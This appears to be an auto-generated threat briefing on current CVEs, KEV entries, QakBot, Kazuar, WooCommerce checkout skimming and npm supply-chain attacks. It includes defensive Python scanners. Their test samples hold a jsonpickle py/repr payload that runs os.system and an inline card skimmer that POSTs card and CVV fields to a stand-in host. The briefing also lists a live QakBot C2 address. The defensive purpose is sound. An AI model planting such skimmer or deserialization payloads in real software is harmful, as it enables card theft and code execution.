Cyber Threat Briefing

PUBLISHED 17 May 2026, 11:01 UTC
CLASSIFICATION TLP:CLEAR
AUTO-GENERATED PureTensor Cyber Intelligence
Critical CVEs: 3 | High CVEs: 3 | KEV added: 2 | New IOCs: 0 | Malware samples: 0 | Active C2s: 1
Overall threat level: CRITICAL

DELTA — CHANGES SINCE LAST BRIEFING

THREAT LEVEL ASSESSMENT

The overall threat level is assessed as CRITICAL due to multiple actively exploited vulnerabilities in Microsoft Exchange, Cisco SD‑WAN, and high-volume exploitation of WordPress ecosystems, combined with ongoing activity from established malware families such as QakBot and newly enhanced P2P backdoors like Kazuar. The convergence of fresh KEV additions, active zero‑day exploitation at Pwn2Own, and persistent supply‑chain compromises increases the likelihood of both targeted intrusions and automated broad attacks.

CRITICAL VULNERABILITIES

CVE-2020-37228 | iDS6 DSSPro Digital Signage System 6.2 | CVSS 9.8 | Not confirmed exploited
  Impact: authentication bypass via CAPTCHA retrieval, enabling brute-force attacks.
CVE-2020-37239 | libbabl 0.1.62 | CVSS 9.8 | Not confirmed exploited
  Impact: double free leading to memory-safety violations and potential RCE.
CVE-2021-47952 | Python jsonpickle 2.0.0 | CVSS 9.8 | Not confirmed exploited
  Impact: RCE through malicious JSON containing py/repr objects, which the decoder passes to eval().
CVE-2026-42897 | Microsoft Exchange Server | High (no CVSS published) | Actively exploited (KEV)
  Impact: XSS enabling remote code execution via a crafted email.
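The jsonpickle entry above is the classic unsafe-deserialization pattern: jsonpickle reconstructs Python objects from JSON keys that start with "py/", and affected versions hand the py/repr tag to eval(). The practical control is to never let untrusted input reach jsonpickle.decode() unvetted. The scanner below is an added example (not code from the briefing or from the jsonpickle project) that parses input with the standard json module, which never executes anything, and refuses any document carrying py/* tags. The assumption that all object-reconstruction tags share the "py/" prefix, and the sample payloads, are constructed for this illustration.

```python
import json

# jsonpickle reconstructs Python objects from JSON keys that start with "py/"
# (py/object, py/reduce, py/repr, ...). With untrusted input those tags are the
# attack surface: py/repr in particular reaches eval() in affected versions.
# Assumption: every reconstruction tag shares this prefix (verify for your version).
PICKLE_TAG_PREFIX = "py/"


def find_pickle_tags(node, path="$"):
    """Walk a parsed JSON tree; return (json_path, key) for every py/* tag found."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            if isinstance(key, str) and key.startswith(PICKLE_TAG_PREFIX):
                hits.append((path, key))
            hits.extend(find_pickle_tags(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            hits.extend(find_pickle_tags(item, f"{path}[{i}]"))
    return hits


def check_payload(text):
    """Parse with json.loads (which never executes code) and list offending tags."""
    return find_pickle_tags(json.loads(text))


def safe_json_load(text):
    """Return parsed data only if it carries no jsonpickle tags; raise otherwise."""
    data = json.loads(text)
    tags = find_pickle_tags(data)
    if tags:
        raise ValueError(f"refusing to decode: jsonpickle tags at {tags}")
    return data


# Constructed sample inputs (not captured traffic).
BENIGN = '{"user": "alice", "roles": ["viewer"], "prefs": {"theme": "dark"}}'
MALICIOUS = '{"user": "alice", "prefs": {"py/repr": "os/os.system(\'id\')"}}'

if __name__ == "__main__":
    print(check_payload(BENIGN))     # []
    print(check_payload(MALICIOUS))  # [('$.prefs', 'py/repr')]
```

Gate external input through safe_json_load() and only hand data that passed it to jsonpickle, if you need jsonpickle at all; for plain data interchange the standard json module is sufficient and has no object-reconstruction path.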

ACTIVE EXPLOITS & KEV

CVE-2026-42897 | Microsoft Exchange Server | Added to KEV 2026-05-15 | Remediation due 2026-05-29 | Active exploitation confirmed
CVE-2026-20182 | Cisco Catalyst SD-WAN Controller | Added to KEV 2026-05-14 | Remediation due 2026-05-17 | Active exploitation confirmed; admin access possible
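Turning the KEV table into action means matching the catalog against what you actually run and ranking by due date. The script below is an added example (not part of the briefing) that does this offline against a constructed feed fragment in the shape of CISA's KEV JSON (the field names cveID, vendorProject, product, dateAdded, dueDate follow the published schema; the two entries mirror this briefing's table). The inventory set and the assessment date are inputs you supply; the horizon of seven days is an assumption.

```python
import json
from datetime import date

# Constructed sample in the shape of CISA's KEV JSON feed; the entries mirror the
# briefing's KEV table. In production fetch the live catalog instead.
KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {"cveID": "CVE-2026-42897", "vendorProject": "Microsoft",
         "product": "Exchange Server", "dateAdded": "2026-05-15",
         "dueDate": "2026-05-29", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2026-20182", "vendorProject": "Cisco",
         "product": "Catalyst SD-WAN Controller", "dateAdded": "2026-05-14",
         "dueDate": "2026-05-17", "knownRansomwareCampaignUse": "Unknown"},
    ],
})


def triage_kev(feed_json, inventory, today_iso, horizon_days=7):
    """Filter a KEV feed to products in `inventory` and rank them by urgency.

    inventory: set of (vendorProject, product) pairs deployed in the estate.
    today_iso: assessment date as YYYY-MM-DD (an explicit input so runs are reproducible).
    Returns dicts sorted by days_left, so OVERDUE entries come first.
    """
    today = date.fromisoformat(today_iso)
    feed = json.loads(feed_json)
    rows = []
    for v in feed["vulnerabilities"]:
        if (v["vendorProject"], v["product"]) not in inventory:
            continue
        days_left = (date.fromisoformat(v["dueDate"]) - today).days
        if days_left < 0:
            status = "OVERDUE"
        elif days_left <= horizon_days:  # assumption: one-week escalation window
            status = "DUE_SOON"
        else:
            status = "SCHEDULED"
        rows.append({"cve": v["cveID"], "product": v["product"],
                     "due": v["dueDate"], "days_left": days_left, "status": status})
    rows.sort(key=lambda r: r["days_left"])
    return rows


if __name__ == "__main__":
    estate = {("Microsoft", "Exchange Server"), ("Cisco", "Catalyst SD-WAN Controller")}
    for row in triage_kev(KEV_SAMPLE, estate, "2026-05-17"):
        print(f'{row["status"]:<10} {row["cve"]} {row["product"]} due {row["due"]} ({row["days_left"]}d)')
```

Run against this briefing's date, the Cisco entry comes out DUE_SOON with zero days left and the Exchange entry SCHEDULED with twelve. The vendorProject/product strings in the live catalog are free text, so in practice map them to your CMDB names once rather than matching exact strings.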

MALWARE & THREAT ACTORS

QakBot: Feodo Tracker reports one active C2 endpoint: 50.16.16.211:443, continuously online since December 2025. QakBot remains a high-value threat for credential theft, lateral movement, and ransomware staging.
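The single IOC above is only useful if it is actually run against egress telemetry. The matcher below is an added example (not from the briefing or Feodo Tracker) that sweeps constructed firewall-style log lines for connections to the listed C2. It reports an exact IP:port match as high confidence and the same IP on another port as medium, because C2 ports rotate more often than addresses; the log layout, the regex and the sample lines (destinations drawn from RFC 5737 documentation ranges) are assumptions to adapt to your real export.

```python
import re

# IOC from the briefing's QakBot entry (Feodo Tracker): C2 address -> known ports.
C2_IOCS = {"50.16.16.211": {443}}

# Constructed sample lines in a simplified "timestamp src dst:port action" layout.
# Benign destinations use RFC 5737 documentation addresses. Adapt LINE_RE to your export.
LOG_LINES = """\
2026-05-17T09:12:01Z 10.20.4.17 203.0.113.10:443 ALLOW
2026-05-17T09:12:07Z 10.20.4.17 50.16.16.211:443 ALLOW
2026-05-17T09:13:44Z 10.20.7.2 50.16.16.211:8443 DENY
2026-05-17T09:14:02Z 10.20.4.19 198.51.100.7:443 ALLOW
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<dst>[^:\s]+):(?P<port>\d+)\s+(?P<action>\S+)$"
)


def match_c2_connections(lines, iocs=C2_IOCS):
    """Return every connection whose destination is a listed C2 address.

    Exact IP:port -> 'high'; listed IP on another port -> 'medium'.
    A DENY verdict is still a hit: the internal host attempted to beacon.
    """
    hits = []
    for line in lines.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparsed line; in production count these so blind spots show
        dst, port = m["dst"], int(m["port"])
        if dst not in iocs:
            continue
        hits.append({
            "ts": m["ts"], "src": m["src"], "dst": dst, "port": port,
            "action": m["action"],
            "confidence": "high" if port in iocs[dst] else "medium",
        })
    return hits


if __name__ == "__main__":
    for hit in match_c2_connections(LOG_LINES):
        print(f'{hit["ts"]} {hit["src"]} -> {hit["dst"]}:{hit["port"]} '
              f'{hit["action"]} confidence={hit["confidence"]}')
```

On the sample input both 10.20.4.17 (successful connection on 443) and 10.20.7.2 (blocked attempt on 8443) come back as hosts to isolate and triage; the block only stops the beacon, not the infection behind it.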

Kazuar (Turla): Recent intelligence indicates the backdoor has evolved into a modular P2P botnet designed for long-term persistence and stealth, with infected hosts relaying command and control traffic for one another rather than each contacting a central server. Removing any single node or server therefore does little to disrupt the network, which significantly enhances operational resilience against takedown attempts.

WordPress Threat Ecosystem: Active skimming attacks leveraging the Funnel Builder plugin continue, with adversaries injecting malicious JavaScript into WooCommerce checkout pages. This aligns with broader card‑stealing operations targeting the e‑commerce ecosystem.
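For the Funnel Builder skimming campaign described here (and in the news digest entry below), the defensive check on the blue-team side is to audit what scripts the checkout page actually serves. The auditor below is an added example (not part of the briefing, and not a published detection signature) that collects every script tag, flags external sources outside an allowlist of hosts you control, and flags inline scripts that combine obfuscation helpers with payment-field access plus an outbound channel. The heuristics, the allowlist and the sample page with its injected loader and skimmer are all constructed for this illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristics for skimmer-style inline scripts. These are illustrative assumptions,
# not a vendor signature: tune them to your own checkout's legitimate scripts.
OBFUSCATION = re.compile(r"\b(atob|eval|unescape|String\.fromCharCode|document\.write)\b")
CARD_FIELDS = re.compile(r"(card|cvv|cvc|expir|ccnum)", re.I)
EXFIL_CHANNEL = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|new Image)\b")


class ScriptCollector(HTMLParser):
    """Collect every <script> on the page as {'src': ..., 'body': ...}."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts.append({"src": self._src, "body": "".join(self._buf)})
            self._in_script = False


def audit_checkout_page(html, allowed_hosts):
    """Return (kind, detail) findings for scripts a checkout page should not carry.

    allowed_hosts: hostnames permitted to serve external scripts (your site, your
    payment gateway). Relative src values are treated as same-origin.
    """
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for script in parser.scripts:
        if script["src"]:
            host = urlparse(script["src"]).hostname  # handles protocol-relative "//host/x.js"
            if host and host not in allowed_hosts:
                findings.append(("external_script", script["src"]))
            continue
        body = script["body"]
        reasons = []
        if OBFUSCATION.search(body):
            reasons.append("obfuscation-helper")
        if CARD_FIELDS.search(body) and EXFIL_CHANNEL.search(body):
            reasons.append("card-field-exfil")
        if reasons:
            findings.append(("inline_script", ", ".join(reasons)))
    return findings


# Constructed checkout page: one legitimate WooCommerce asset and one benign inline
# script, plus an injected external loader and an inline skimmer for illustration.
SAMPLE_PAGE = """<html><head>
<script src="https://shop.example/wp-content/plugins/woocommerce/assets/js/checkout.min.js"></script>
<script src="//cdn-stats.example/loader.js"></script>
</head><body>
<form id="checkout"><input name="billing_card_number"><input name="billing_cvv"></form>
<script>jQuery(function($){ $('#billing_first_name').focus(); });</script>
<script>
var u=atob('aHR0cHM6Ly9jZG4tc3RhdHMuZXhhbXBsZS9jb2xsZWN0');
document.getElementById('checkout').addEventListener('submit',function(){
  var d={};
  document.querySelectorAll('input[name*=card],input[name*=cvv]').forEach(function(i){d[i.name]=i.value;});
  fetch(u,{method:'POST',body:JSON.stringify(d)});
});
</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_checkout_page(SAMPLE_PAGE, {"shop.example"}):
        print(kind, detail)
```

Run this against the rendered checkout HTML as a customer sees it (the injection lands in what the server emits, not in the plugin's source on disk), and diff the findings between runs so a newly appearing script stands out. A Content-Security-Policy with a script-src allowlist is the preventive counterpart of the same check.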

Node‑IPC Supply Chain Compromise: Multiple malicious versions of node‑ipc were published with credential‑stealing payloads, heightening risks for developers and CI/CD environments depending on compromised npm modules.

CYBER NEWS DIGEST

Microsoft Exchange Server XSS Zero‑Day Exploited (The Hacker News, Microsoft): Attackers are leveraging CVE‑2026‑42897 to execute code on on‑prem Exchange environments via crafted emails. Microsoft issued mitigations and CISA added it to KEV, indicating confirmed exploitation and urgency for patching.

Cisco Catalyst SD-WAN Auth Bypass Actively Exploited (CISA Alerts, The Hacker News, Dark Reading): CVE‑2026‑20182 enables unauthenticated access to SD‑WAN Controller environments, and exploitation has resulted in full admin access in observed incidents. CISA's remediation due date of 2026-05-17 falls on the day of this briefing, so any unpatched controller is already past its window.

WordPress Funnel Builder Plugin Actively Abused for Checkout Skimming (Bleeping Computer, The Hacker News): A critical vulnerability is being weaponized to inject malicious JS into WooCommerce checkout flows. The campaign resembles Magecart-style operations, with active theft of credit card data.

Kazuar Transformed into Modular P2P Botnet (The Hacker News, Bleeping Computer): Turla’s long-running backdoor has evolved into a distributed P2P malware platform, improving stealth and persistence. The botnet architecture reduces reliance on centralized C2 and complicates detection.

Canvas Breach Causes Nationwide Education Disruptions (Krebs on Security): Extortion-driven outages impacted schools and universities across the U.S., highlighting downstream operational risk from third-party education platforms.

Supply Chain Attack Hits node‑ipc npm Package (Bleeping Computer, The Hacker News): Malicious actors injected secret‑stealing code into multiple versions of node‑ipc, targeting developer machines and CI environments. This continues the trend of supply chain compromises within npm.

OpenAI Employee Devices Impacted by TanStack Attack (The Hacker News): A supply-chain attack (Mini Shai‑Hulud) compromised two internal OpenAI employee devices, though no customer or production data was impacted. This incident underscores the expanding risk of developer‑tool compromises.

Russia-Linked Router Exploitation Campaign Steals Microsoft Office Tokens (Krebs on Security): Russian military‑aligned groups weaponized vulnerabilities in outdated routers to harvest authentication tokens, fueling espionage campaigns targeting Microsoft Office users globally.